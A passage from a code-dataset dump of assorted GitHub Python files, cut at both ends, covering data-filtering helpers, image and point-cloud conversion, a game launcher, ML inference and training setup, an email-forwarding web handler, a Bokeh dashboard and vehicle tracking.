df.columns if df[x].dtype.char == \"O\"))\n\n return df\n\n\ndef check_data(df: pd.DataFrame, *cols: str) -> None:\n \"\"\"Check that the provided cols are the only ones moving and there are no N/As\"\"\"\n not_cols = set(cols) - set(str(x) for x in df.columns)\n if not_cols:\n raise ValueError(f\"df does not contain colums: {not_cols}\")\n\n # check that values in cols are non-null\n for col in cols:\n if df[col].isna().any():\n raise ValueError(f\"col '{col}' from var contains N/A value(s)\")\n\n # now check that the only remaining variable columns can be found in cols\n # (except \"name\" and \"version\", which are probably varying with the values in cols)\n for col in df.columns:\n if col in cols or col in (\"name\", \"version\"):\n continue\n unique_vals = df[col].unique()\n if len(unique_vals) > 1:\n raise ValueError(f\"Column '{col}' contains values '{unique_vals}'\")\n\n\nA = TypeVar(\"A\")\n\n\ndef _filter_preamble(\n df: pd.DataFrame, args: Sequence[Dict[str, A]], kwargs: Dict[str, A],\n) -> Dict[str, A]:\n if len(args) > 1 or (len(args) == 1) == (len(kwargs) > 0):\n raise ValueError(\"Either pass dict or keyword args\")\n\n if len(args) == 1:\n col2x = args[0]\n else:\n col2x = kwargs\n\n not_cols = set(col2x) - set(str(x) for x in df.columns)\n if not_cols:\n raise ValueError(f\"df does not contain colums: {not_cols}\")\n\n return col2x\n\n\n@overload\ndef filter_data_in(df: pd.DataFrame, col2seq: Dict[str, Iterable[Any]]) -> pd.DataFrame:\n ...\n\n\n@overload\ndef filter_data_in(df: pd.DataFrame, **col_seq: Iterable[Any]) -> pd.DataFrame:\n ...\n\n\ndef filter_data_in(\n df: pd.DataFrame, *args: Dict[str, Iterable[Any]], **kwargs: Iterable[Any]\n) -> pd.DataFrame:\n \"\"\"Filter data with column values matching a value in iterables passed\"\"\"\n col2seq = _filter_preamble(df, args, kwargs)\n\n idx = True\n for col, seq in col2seq.items():\n idx = df[col].isin(list(seq)) & idx\n\n return df.loc[idx]\n\n\n@overload\ndef filter_data_equal(df: pd.DataFrame, col2val: Dict[str, Any]) -> pd.DataFrame:\n ...\n\n\n@overload\ndef filter_data_equal(df: pd.DataFrame, **col_val: Any) -> pd.DataFrame:\n ...\n\n\ndef filter_data_equal(\n df: pd.DataFrame, *args: Dict[str, Any], **kwargs: Any\n) -> pd.DataFrame:\n \"\"\"Filter data with column values matching those passed\"\"\"\n col2val = _filter_preamble(df, args, kwargs)\n\n idx = True\n for col, val in col2val.items():\n idx = (df[col] == val) & idx\n\n return df.loc[idx]\n","repo_name":"sdrobert/scpc","sub_path":"scripts/exp_utils.py","file_name":"exp_utils.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7951264731","text":"import os\nimport img2ply\n#import pdb\n\nif __name__ == \"__main__\": \n # get path\n image_path = \"/home/ms/Desktop/Point_Cloud_Monjoy/data_19Jan2021/1_image_data/\"\n save_path = \"/home/ms/Desktop/Point_Cloud_Monjoy/data_19Jan2021/2_ply_data/\"\n source_folders = os.listdir(image_path)\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n print(\"Created ouput directory: \" + save_path)\n for single_folder in source_folders:\n fname_image_folder = os.path.basename(single_folder)\n #print(single_file)\n input = (image_path + single_folder)\n ply = (save_path +fname_image_folder +\".ply\")\n \n img2ply.convert(\n input, \n ply, \n [15.0, 10.0, 15.0],\n direction=\"y\", \n inverse=True,\n ignoreAlpha=True,\n wSamples=0, \n hSamples=0, \n maintainAspectRatio=True\n #get list of png source files\n \n #pdb.set_trace()\n # get input and output\n #input = os.path.join(path, \"images\")\n #ply = os.path.join(path, \"new_modified.ply\")\n \n # convert\n# img2ply.convert(\n# input, \n# ply, \n# [15.0, 10.0, 15.0],\n# direction=\"y\", \n# inverse=True,\n# ignoreAlpha=True,\n# wSamples=0, \n# hSamples=0, \n# maintainAspectRatio=True\n )\n","repo_name":"sharmalab/GGOs_COVID-19","sub_path":"1_Convert_images_to_point_cloud/2a_convert_monjoy.py","file_name":"2a_convert_monjoy.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32148344664","text":"#!/usr/bin/env python3\nimport os\nimport subprocess\nimport json\n\njson_file_path = os.path.expanduser(\"~/.config/league_install_path.json\")\n\nwith open(json_file_path, \"r\") as json_file:\n settings = json.load(json_file)\n game_installed_folder = settings[\"game_main_dir\"]\n os.chdir(game_installed_folder)\n\ngame_main_dir = os.path.join(game_installed_folder)\ngame_main_wine_dir = os.path.join(game_main_dir, \"wine\")\ngame_prefix_dir = os.path.join(game_main_wine_dir, \"prefix\")\ngame_exe_path = os.path.join(game_prefix_dir, \"drive_c\", \"Riot Games\", \"Riot Client\")\ngame_exe_file_name = \"RiotClientServices.exe\"\nwine_loader_path = os.path.join(game_main_wine_dir, \"wine-build\", \"bin\", \"wine\")\n\nenv_vars_file_path = os.path.join(game_installed_folder, \"env_vars.json\")\n\nwith open(env_vars_file_path, \"r\") as env_vars_file:\n env_vars = json.load(env_vars_file)\n game_launcher_options = env_vars.get(\"game_launcher_options\", {})\n\n# Replace placeholders in game launcher options with actual values\ngame_launcher_options[\"PATH\"] = os.path.join(game_main_wine_dir, \"wine-build\", \"bin\")\ngame_launcher_options[\"WINEPREFIX\"] = game_prefix_dir\ngame_launcher_options[\"WINELOADER\"] = wine_loader_path\n\nstart_game_vars = dict(os.environ, **game_launcher_options)\n\nwine_process = [\n game_launcher_options[\"WINELOADER\"],\n os.path.join(game_exe_path, game_exe_file_name),\n \"--launch-product=league_of_legends\",\n \"--launch-patchline=live\",\n]\n\nsubprocess.run(wine_process, env=start_game_vars, check=True)\n","repo_name":"kassindornelles/lol-for-linux-installer","sub_path":"src/launch-script.py","file_name":"launch-script.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"54"} +{"seq_id":"24916521824","text":"import os\nimport onnxruntime\nimport torch\nimport numpy as np\nimport wandb\nfrom PIL import Image\nfrom colorize_model.utils import lab_to_rgb\nfrom constants import wandb_project_path\n\n\nwandb_api = wandb.Api()\nmodel_artifact = wandb_api.artifact(f\"{wandb_project_path}/generator:best\")\nmodel_dir = model_artifact.download(root=\"colorize_model/saved_models\")\nmodel_path = os.path.join(model_dir, \"generator.onnx\")\n\nort_session = onnxruntime.InferenceSession(model_path)\nmetadata = ort_session.get_modelmeta()\nprint(f\"Model Description: {metadata.description}\")\nprint(f\"Model metadata: {metadata.custom_metadata_map}\")\n\n\ndef to_numpy(tensor):\n return tensor.detach().cpu().numpy() if tensor.requires_grad else tensor.cpu().numpy()\n\n\ndef process_image(image_l, size=(256, 256)) -> torch.tensor:\n image_l = Image.open(image_l).convert(\"L\")\n original_size = image_l.size\n image_l = image_l.resize(size, Image.Resampling.BICUBIC)\n image_l = np.asarray(image_l).astype(\"float32\")\n image_l = (image_l / 255 * 100) / 50. - 1.\n image_l = torch.tensor(image_l).unsqueeze(0).unsqueeze(0)\n return image_l, original_size\n\n\ndef get_colorized_image(image_l) -> np.array:\n image_l, original_size = process_image(image_l, size=(256, 256))\n\n ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(image_l)}\n ort_outs = ort_session.run(None, ort_inputs)\n image_ab = torch.tensor(ort_outs[0])\n\n image_rgb = lab_to_rgb(image_l, image_ab)\n image_rgb = (image_rgb.squeeze(0) * 255).astype(np.uint8)\n image_rgb = Image.fromarray(image_rgb)\n image_rgb = image_rgb.resize(original_size, Image.Resampling.BICUBIC)\n return image_rgb\n","repo_name":"ESkripichnikov/image-colorization-api","sub_path":"colorize_model/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4779464278","text":"from keras.preprocessing.image import ImageDataGenerator\n# from keras.preprocessing.sequence import\n\n\nimg_width, img_height = 28, 28\n\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/validation'\n# nb_train_samples = 1\n# nb_validation_samples = 2\nepochs = 1\nbatch_size = 2\n\n# this is the augmentation configuration we will use for training\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\n# this is the augmentation configuration we will use for testing:\n# only rescaling\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\ntest_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_width, img_height),\n batch_size=batch_size,\n class_mode='binary')\n\ntrain_datagen = ImageDataGenerator(rescale=1. / 255)\n\nitr = train_datagen.flow_from_directory(\ntrain_data_dir,\ntarget_size=(img_width, img_height),\nbatch_size=1,\nclass_mode='binary')\n\nX, y = itr.next()\n\n","repo_name":"jassim-jasmin/ai","sub_path":"other/CBIR/getDataset.py","file_name":"getDataset.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"11656979139","text":"import discordrp\nimport time\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport json\nimport threading\n\nclient_id = \"your_application_id\" # you can visit the discord developar portal to generate one.\n\ndef update_presence():\n try:\n state = state_entry.get()\n details = details_entry.get()\n large_image = large_image_entry.get()\n large_text = large_text_entry.get()\n small_image = small_image_entry.get()\n small_text = small_text_entry.get()\n\n button1_label = button1_label_entry.get()\n button1_url = button1_url_entry.get()\n\n button2_label = button2_label_entry.get()\n button2_url = button2_url_entry.get()\n\n presence_data = {\n \"state\": state,\n \"details\": details,\n \"timestamps\": {\n \"start\": int(time.time()),\n },\n \"assets\": {\n \"large_image\": large_image,\n \"large_text\": large_text,\n \"small_image\": small_image,\n \"small_text\": small_text,\n },\n \"buttons\": [\n {\n \"label\": button1_label,\n \"url\": button1_url,\n },\n {\n \"label\": button2_label,\n \"url\": button2_url,\n },\n ],\n }\n presence.set(presence_data)\n status_label.config(text=\"Presence updated\")\n except Exception as e:\n status_label.config(text=\"Error: \" + str(e))\ndef exit_application():\n root.quit()\ndef save_presence():\n presence_data = {\n \"state\": state_entry.get(),\n \"details\": details_entry.get(),\n \"large_image\": large_image_entry.get(),\n \"large_text\": large_text_entry.get(),\n \"small_image\": small_image_entry.get(),\n \"small_text\": small_text_entry.get(),\n \"button1_label\": button1_label_entry.get(),\n \"button1_url\": button1_url_entry.get(),\n \"button2_label\": button2_label_entry.get(),\n \"button2_url\": button2_url_entry.get(),\n }\n\n file_path = filedialog.asksaveasfilename(defaultextension=\".json\", filetypes=[(\"JSON Files\", \"*.json\")])\n if file_path:\n with open(file_path, \"w\") as file:\n json.dump(presence_data, file)\n status_label.config(text=f\"Presence saved to {file_path}\")\ndef load_presence():\n file_path = filedialog.askopenfilename(filetypes=[(\"JSON Files\", \"*.json\")])\n if file_path:\n with open(file_path, \"r\") as file:\n presence_data = json.load(file)\n state_entry.delete(0, tk.END)\n state_entry.insert(0, presence_data.get(\"state\", \"\"))\n details_entry.delete(0, tk.END)\n details_entry.insert(0, presence_data.get(\"details\", \"\"))\n large_image_entry.delete(0, tk.END)\n large_image_entry.insert(0, presence_data.get(\"large_image\", \"\"))\n large_text_entry.delete(0, tk.END)\n large_text_entry.insert(0, presence_data.get(\"large_text\", \"\"))\n small_image_entry.delete(0, tk.END)\n small_image_entry.insert(0, presence_data.get(\"small_image\", \"\"))\n small_text_entry.delete(0, tk.END)\n small_text_entry.insert(0, presence_data.get(\"small_text\", \"\"))\n button1_label_entry.delete(0, tk.END)\n button1_label_entry.insert(0, presence_data.get(\"button1_label\", \"\"))\n button1_url_entry.delete(0, tk.END)\n button1_url_entry.insert(0, presence_data.get(\"button1_url\", \"\"))\n button2_label_entry.delete(0, tk.END)\n button2_label_entry.insert(0, presence_data.get(\"button2_label\", \"\"))\n button2_url_entry.delete(0, tk.END)\n button2_url_entry.insert(0, presence_data.get(\"button2_url\", \"\"))\n status_label.config(text=f\"Presence loaded from {file_path}\")\ndef stop_presence():\n presence.clear()\n status_label.config(text=\"Presence stopped\")\ndef display_help():\n help_text = \"\"\"Discord Rich Presence Help\n- State: The state of your current activity.\n- Details: Details about your current activity.\n- Large Image assest code or url: the image assest code generated in the developer portal rich presence section or you can use the image url.\n- Image Text: Text to display for the large image.\n- Small Image assest code or url: the image assest code generated in the developer portal rich presence section or you can use the image url.\n- Small Image Text: Text to display for the small image.\n- Button 1 Label: Label for the first button.\n- Button 1 URL: URL to open when the first button is clicked.\n- Button 2 Label: Label for the second button.\n- Button 2 URL: URL to open when the second button is clicked.\nClick 'Update Presence' to update your Discord Rich Presence based on the provided information.\n\ndevelopor: ore.e\n\"\"\"\n help_window = tk.Toplevel(root)\n help_window.title(\"Help\")\n help_label = ttk.Label(help_window, text=help_text, wraplength=400, font=(\"Arial\", 12))\n help_label.pack(padx=10, pady=10)\ndef toggle_dark_mode():\n dark_mode = dark_mode_var.get()\n if dark_mode:\n background_color = \"#333\"\n foreground_color = \"#EEE\"\n button_background_color = \"black\"\n button_foreground_color = \"white\"\n else:\n background_color = \"white\"\n foreground_color = \"black\"\n button_background_color = \"#4CAF50\"\n button_foreground_color = \"white\"\n root.tk_setPalette(background=background_color, foreground=foreground_color)\n style.configure(\"Custom.TLabel\", foreground=foreground_color)\n style.configure(\"Custom.TEntry\", background=background_color, foreground=foreground_color)\n style.configure(\"Custom.TButton\", background=button_background_color, borderwidth=1, relief=\"raised\")\n style.configure(\"Round.TButton\", background=button_background_color, borderwidth=1, relief=\"raised\", foreground=button_foreground_color)\n update_button.configure(style=\"RoundDark.TButton\" if dark_mode else \"Round.TButton\")\n\n\nroot = tk.Tk()\nroot.title(\"Discord Rich Presence\")\nroot.grid_rowconfigure(0, weight=1)\nroot.grid_columnconfigure(0, weight=1)\nstyle = ttk.Style()\nstyle.theme_use(\"clam\") \nstyle.configure(\"Custom.TLabel\", padding=5, font=(\"Arial\", 12))\nstyle.configure(\"Custom.TEntry\", padding=5, font=(\"Arial\", 12))\nstyle.configure(\"Custom.TButton\", padding=5, relief=\"raised\", background=\"#4CAF50\", borderwidth=1)\nstyle.configure(\"Round.TButton\", padding=5, relief=\"raised\", background=\"#4CAF50\", borderwidth=1, foreground=\"white\")\nstyle.configure(\"RoundDark.TButton\", padding=5, relief=\"raised\", background=\"#4CAF50\", borderwidth=1, foreground=\"black\")\ndark_mode_var = tk.BooleanVar(value=False)\ndef create_label_entry(parent, text, row, col):\n label = ttk.Label(parent, text=text, style=\"Custom.TLabel\")\n label.grid(row=row, column=col, sticky=\"w\")\n entry = ttk.Entry(parent, style=\"Custom.TEntry\")\n entry.grid(row=row, column=col+1, sticky=\"ew\")\n return entry\n \nrow = 0\nstate_entry = create_label_entry(root, \"State:\", row, 0)\nrow += 1\ndetails_entry = create_label_entry(root, \"Details:\", row, 0)\nrow += 1\nlarge_image_entry = create_label_entry(root, \"Large Image assest code/url:\", row, 0)\nrow += 1\nlarge_text_entry = create_label_entry(root, \"Image Text:\", row, 0)\nrow += 1\nsmall_image_entry = create_label_entry(root, \"Small Image assest code/url:\", row, 0)\nrow += 1\nsmall_text_entry = create_label_entry(root, \"Small Image Text:\", row, 0)\nrow += 1\nbutton1_label_entry = create_label_entry(root, \"Button 1 Label:\", row, 0)\nrow += 1\nbutton1_url_entry = create_label_entry(root, \"Button 1 URL:\", row, 0)\nrow += 1\nbutton2_label_entry = create_label_entry(root, \"Button 2 Label:\", row, 0)\nrow += 1\nbutton2_url_entry = create_label_entry(root, \"Button 2 URL:\", row, 0)\nrow += 1\nupdate_button = ttk.Button(root, text=\"Update Presence\", command=update_presence, style=\"Round.TButton\")\nupdate_button.grid(row=row, column=0, columnspan=2, pady=(10, 20), sticky=\"w\")\nstop_button = ttk.Button(root, text=\"Stop Presence\", command=stop_presence, style=\"RoundStop.TButton\")\nstop_button.grid(row=row, column=2, columnspan=2, pady=(10, 20), sticky=\"w\")\ndark_mode_checkbutton = ttk.Checkbutton(root, text=\"Dark Mode\", variable=dark_mode_var, command=toggle_dark_mode, style=\"Custom.TLabel\")\ndark_mode_checkbutton.grid(row=0, column=3, padx=10)\nstatus_label = ttk.Label(root, text=\"\", style=\"Custom.TLabel\")\nstatus_label.grid(row=row+1, column=0, columnspan=4)\nmenu = tk.Menu(root)\nroot.config(menu=menu)\nfile_menu = tk.Menu(menu)\nmenu.add_cascade(label=\"File\", menu=file_menu)\nfile_menu.add_command(label=\"Save\", command=save_presence)\nfile_menu.add_command(label=\"Load\", command=load_presence)\nfile_menu.add_separator()\nfile_menu.add_command(label=\"Exit\", command=exit_application)\nhelp_menu = tk.Menu(menu)\nmenu.add_cascade(label=\"Help\", menu=help_menu)\nhelp_menu.add_command(label=\"Show Help\", command=display_help)\nwith discordrp.Presence(client_id) as presence:\n print(\"Connected\")\n root.mainloop()","repo_name":"ore0Os/discord_rich_presence","sub_path":"rich_presence.py","file_name":"rich_presence.py","file_ext":"py","file_size_in_byte":9060,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"12812067956","text":"import logging\n\nimport bleach\nimport datetime\nimport tornado.web\nimport json\nfrom settings import email, environment\n\nfrom src.aswwu.base_handlers import BaseHandler\n\nlogger = logging.getLogger(environment[\"log_name\"])\n\n\nclass OpenForumHandler(BaseHandler):\n @tornado.web.authenticated\n def post(self):\n maxChars = 1000\n reply_to = self.current_user.username\n try:\n json_data = json.loads(self.request.body.decode('utf-8'))\n for key in json_data:\n if key == \"recipient\":\n to = adminUsernameExpander(bleach.clean(json_data[key]))\n elif key == \"message_body\":\n body = json_data[key]\n if len(body) > maxChars:\n body = body[0:maxChars]\n body = bleach.clean(body)\n elif key == \"reply-to\":\n reply_to = bleach.clean(json_data[key])\n else:\n self.set_status(500)\n self.write({'status': 'invalid parameters'})\n return\n subject = \"Message from \" + reply_to\n\n emailAdministration(to, subject, body, reply_to)\n self.set_status(200)\n self.write({\"status\": \"success\"})\n\n except Exception as e:\n self.set_status(500)\n self.write({\"status\": \"Error\"})\n print(e.message)\n \n\ndef adminUsernameExpander(recipient):\n \"\"\"Convert an admin position title into the corresponding email address username\n \n TODO: uncomment real addresses\n\n Arguments:\n recipient {string} -- the title of an admin position\n Raises:\n ValueError -- When the recipient field doesn't match an ASWWU position\n Returns:\n string -- the username of the aswwu position\n \"\"\"\n\n adminEmails =\t{\n \"President\": \"aswwu.pres\",\n \"Vice President\": \"aswwu.evp\",\n \"Financial VP\": \"aswwu.fvp\",\n \"Social VP\": \"aswwu.spiritual\",\n \"Spiritual VP\": \"aswwu.social\",\n \"Marketing VP\": \"aswwu.marketing\"\n }\n if recipient in adminEmails:\n return adminEmails[recipient]\n else:\n raise ValueError('The selected recipient is not a valid ASWWU Open Forum Recipient.')\n\n\ndef emailAdministration(TO, SUBJECT, BODY, REPLY_TO):\n \"\"\"Send an email using the webmaster account and a custom Reply-To address.\n Arguments:\n TO {string} -- username of email recipient\n SUBJECT {string} -- subject line of the email\n BODY {string} -- body text of the email\n REPLY_TO {string} -- username of message author\n \"\"\"\n import smtplib\n \n domain = \"wallawalla.edu\"\n SEND_USING = email['username'] # Webmaster account, contains @wallawalla.edu\n SEND_TO = TO + \"@\" + domain # admin recipient \n REPLY_TO = REPLY_TO + \"@\" + domain # user who sent the message\n SUBJECT = \"Open Forum Submission: \" + SUBJECT\n TEXT = (\"---- Message from \" + REPLY_TO + \", Sent at \" + str(datetime.datetime.now()) + \" ----\\n\\n\" + BODY + \"\\n\\n---- End Message ----\")\n\n smtpsrv = \"smtp.office365.com\"\n smtpserver = smtplib.SMTP(smtpsrv)\n # smtpserver.set_debuglevel(1)\n smtpserver.ehlo()\n smtpserver.starttls()\n smtpserver.ehlo()\n smtpserver.login(SEND_USING, email['password'])\n\n header = (\n 'To:' + SEND_TO + '\\n' \n + 'From:' + SEND_USING + '\\n' \n + 'Reply-To:' + REPLY_TO + '\\n'\n + 'Subject:%s \\n' % SUBJECT\n )\n msgbody = header + '\\n %s \\n\\n' % TEXT\n\n smtpserver.sendmail(SEND_USING, SEND_TO, msgbody)\n smtpserver.close()\n \n\n","repo_name":"ASWWU-Web/python_server","sub_path":"src/aswwu/route_handlers/homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"21831317788","text":"# encoding: utf-8\n\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport os\nimport sys\n\nsys.path.append(\"C:/Users/jgtzsx01/Documents/workspace/zjsxzy_in_js/news-tracking/src/\")\nimport word_heat_level\n\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import row, widgetbox\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.models.widgets import Slider, TextInput, TableColumn, DataTable, Select\nfrom bokeh.plotting import figure\n\nDATA_DIR = \"C:/Users/jgtzsx01/Documents/workspace/data/asset-class\"\n\nsource = ColumnDataSource(data=dict(date=[], ts=[]))\nsource_absolute = ColumnDataSource(data=dict(date=[], ts=[]))\nsource_weighted = ColumnDataSource(data=dict(date=[], ts=[]))\nsource_table = ColumnDataSource(data=dict())\n\ntools = \"pan,wheel_zoom,box_select,reset\"\nplot = figure(plot_height=400, plot_width=1000, tools=tools, x_axis_type='datetime')\nplot_absolute = figure(plot_height=400, plot_width=1000, tools=tools, x_axis_type='datetime')\nplot_weighted= figure(plot_height=400, plot_width=1000, tools=tools, x_axis_type='datetime')\n\nplot.line('date', 'ts', source=source, line_width=3, line_alpha=0.6)\nplot.circle('date', 'ts', size=1, source=source, color=None, selection_color=\"orange\")\nplot_absolute.line('date', 'ts', source=source_absolute, line_width=3, line_alpha=0.6)\nplot_absolute.circle('date', 'ts', size=1, source=source_absolute, color=None, selection_color=\"orange\")\nplot_weighted.line('date', 'ts', source=source_weighted, line_width=3, line_alpha=0.6)\nplot_weighted.circle('date', 'ts', size=1, source=source_weighted, color=None, selection_color=\"orange\")\n\ncolumns = [\n TableColumn(field=\"word\", title=\"word\"),\n TableColumn(field=\"distance\", title=\"distance\")\n]\ndata_table = DataTable(source=source_table, columns=columns, width=400, height=300)\n\ndef update_title():\n plot_absolute.title.text = text.value + u\"(绝对)= 周词频\"\n plot.title.text = text.value + u\"(相对)= 周词频 / 周所有词总词频\"\n plot_weighted.title.text = text.value + u\"(加权)= 周词频 * 词距离 / 周所有词总词频\"\n\ndef update_data():\n word = text.value\n threshold = float(slider.value)\n start_date = datetime.datetime(int(year_select.value), 1, 1)\n\n fname = os.path.join(DATA_DIR, \"%s_%.1f.csv\"%(word, threshold))\n try:\n if not os.path.exists(fname):\n print(\"calculating...\")\n plot.title.text = \"calculating...\"\n plot_absolute.title.text = \"calculating...\"\n plot_weighted.title.text = \"calculating...\"\n word_heat_level.get_word_heat(word, threshold=threshold)\n except KeyError:\n plot.title.text = u\"没有该关键词\"\n plot_absolute.title.text = u\"没有该关键词\"\n plot_weighted.title.text = u\"没有该关键词\"\n source_table.data = {}\n return\n\n update_title()\n\n dataframe = pd.read_csv(fname)\n dataframe[\"date\"] = pd.to_datetime(dataframe[\"date\"], format=\"%Y-%m-%d\")\n dataframe = dataframe.set_index('date')\n dataframe = dataframe[dataframe.index >= start_date]\n\n # 加权值曲线\n source_weighted.data = source_weighted.from_df(pd.DataFrame({'ts': dataframe[\"weighted\"]}))\n\n # 相对值曲线\n source.data = source.from_df(pd.DataFrame({'ts': dataframe[\"relative\"]}))\n\n # 绝对值曲线\n source_absolute.data = source_absolute.from_df(pd.DataFrame({'ts': dataframe['absolute']}))\n\n # 词表格\n data = pd.read_csv(\"%s/%s_%s_words.csv\"%(DATA_DIR, word, threshold))\n source_table.data = {'word': data['word'], 'distance': data['distance']}\n\nyears_selections = [str(year) for year in range(2010, 2018)]\nyear_select = Select(value=\"2013\", title=\"开始年份\", width=200, options=years_selections)\nyear_select.on_change(\"value\", lambda attr, old, new: update_data())\nslider = TextInput(title=\"阈值\", value=\"0.3\")\n# slider = Slider(title=\"阈值\", start=0.0, end=1.0, value=0.3, step=0.1)\nslider.on_change('value', lambda attr, old, new: update_data())\ntext = TextInput(title=\"关键词(例如:MPA、房地产、通胀)\", value=u'楼市')\ntext.on_change('value', lambda attr, old, new: update_data())\n\nupdate_data()\n\n# Set up layouts and add to document\ninputs = widgetbox(text, slider, year_select)\ntable = widgetbox(data_table)\n\ncurdoc().add_root(row(inputs, table, plot_absolute, plot, plot_weighted, width=800))\ncurdoc().title = u\"关键词历史热度\"\n","repo_name":"alxsoares/zjsxzy_in_js","sub_path":"news-tracking/app/word_heat/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74803269601","text":"# pip install dice-ml\nimport pandas as pd\nimport dice_ml\n\n#from dice_ml.utils import helpers # helper functions\n\ndef get_data_object(data, continuous_features, to_predict):\n \n \"\"\"\n Gets the required features about the data to be used for getting the countefactuals.\n \n Parameters:\n data: the whole dataset which includes the training and testing dataset\n continuous_features: list of names of features that assumes all the possible values in a continuum\n to_predict: the name of the variable to be predicted.\n \n Returns:\n data_object (object): parameters about the data such as such as the range of continuous features and the levels of categorical features. \n \n \"\"\" \n data_object = dice_ml.Data(dataframe=data, continuous_features=continuous_features, outcome_name=to_predict)\n \n return data_object\n\ndef get_explainer_object(model_path, model_backend, data_object):\n \"\"\"\n Provides feature importances to explain the model.\n \n Parameters:\n model: trained model\n model_backend: indicates the implementation type of DiCE we want to use.\n data_object: DiCE data object\n \n Returns:\n explainer (object): provides the feature importances that determines the prediction of the model\n \n \"\"\"\n model_object = dice_ml.Model(model_path=model_path, backend=model_backend) \n \n explainer = dice_ml.Dice(data_object, model_object)\n \n return explainer\n \ndef generate_counterfactual(ready_object, query_instance, number_CF, desired_pred, \n feature_weights, proximity_weight, diversity_weight, feature_to_vary):\n\n \"\"\"\n Generate counterfactual profiles with feature-perturbed versions.\n \n Parameters:\n ready_object: the DiCE class\n query_instance: a query input whose outcome needs to be explained. \n query instance shoulde be in the form of a dictionary; keys: feature name, values: feature value\n number_CF: total number of counterfactuals to generate\n desired_pred: the desired outcome of prediction\n feature_weights: a dictionary; keys: continuous feature name, values: weights. \n proximity_weight: weight for the counterfactuals be closer and feasible to an individual's profile(query instance)\n diversity_weight: weight for the counterfactuals be providing the individual multiple options\n feature_to_vary: a list of features that are allowed to vary since other suggested features are not easily be varied\n\n Returns:\n \n viz(dataframe): profiles with feature-perturbed versions that will produce a desired prediction\n \n \"\"\"\n exp = ready_object\n dice_exp = exp.generate_counterfactuals(query_instance = query_instance, total_CFs=number_CF,\n desired_class=desired_pred, diversity_weight = diversity_weight)\n \n # Visualize counterfactual explanation\n viz = dice_exp.visualize_as_dataframe()\n \n return viz\n","repo_name":"xmpuspus/parity-fairness","sub_path":"parity/counterfactual_explainer.py","file_name":"counterfactual_explainer.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"36606478967","text":"''' Crie um dicionário vazio. Peça para o usuário digitar as chaves e os valores desse dicionário.\r\n Em seguida, verifique se a chave 'profissão' está presente no dicionário.\r\n '''\r\ndicionario = {}\r\n\r\nfor i in range(1, 4):\r\n chave = input('Informe a chave: ')\r\n valor = input('informe o valor: ')\r\n \r\n dicionario[chave] = valor\r\n \r\nif 'profissão' in dicionario:\r\n print('A chave profissão esta presente no dicionario')\r\n \r\nelse: \r\n print('A chave profissão não esta presente no dicionario')\r\n \r\n ","repo_name":"Amandacorreia1/PEED---Lista-02","sub_path":"Questao13.py","file_name":"Questao13.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7894352397","text":"import cv2\nfrom vehicle import Vehicle, Global_Variables\nfrom utils.utils import *\n# import pickle\n\n\ndef main():\n counter = 0 # to break after counter number of frames\n window_size = 3\n vehicles = {}\n global_variables = Global_Variables()\n with open(\"../data/car.txt\", \"r\") as f:\n for line in f:\n counter += 1\n if counter < 0:\n continue\n # if counter > 500:\n # break\n val = line.strip().split(\",\")\n frame_num = int(val[0])\n # store the vehicle ids, frame numbers with points\n vehicle_id = val[1]\n x = int(val[2]) + int(val[4])/2\n y = int(val[3]) + int(val[5])/2\n\n # dont check for the first window points\n if vehicle_id not in vehicles:\n vehicles[vehicle_id] = Vehicle()\n vehicles[vehicle_id].num_of_frames_covered = 1\n vehicles[vehicle_id].car_points[frame_num] = (x, y)\n vehicles[vehicle_id].initial_frame = frame_num\n continue\n else:\n # get the initial slope until you reach the window size\n v = vehicles[vehicle_id]\n v.car_points[frame_num] = (x, y)\n v.num_of_frames_covered += 1\n if v.num_of_frames_covered <= window_size:\n continue\n elif v.num_of_frames_covered == window_size+1:\n vector, norm = get_vector((x, y), v, frame_num, window_size)\n v.init_slope = vector\n global_variables.max_norm = max(norm, global_variables.max_norm)\n continue\n\n vector, norm = get_vector((x, y), v, frame_num, window_size)\n theta = angle_between(vector, v.init_slope)\n v.theta.append(theta)\n v.vectors.append(vector)\n v.norms.append((frame_num, norm))\n global_variables.max_norm = max(norm, global_variables.max_norm)\n\n moving = []\n for v_id in vehicles:\n try:\n v = vehicles[v_id]\n for pair in v.norms:\n frame, norm = pair\n if norm > 0.2:\n 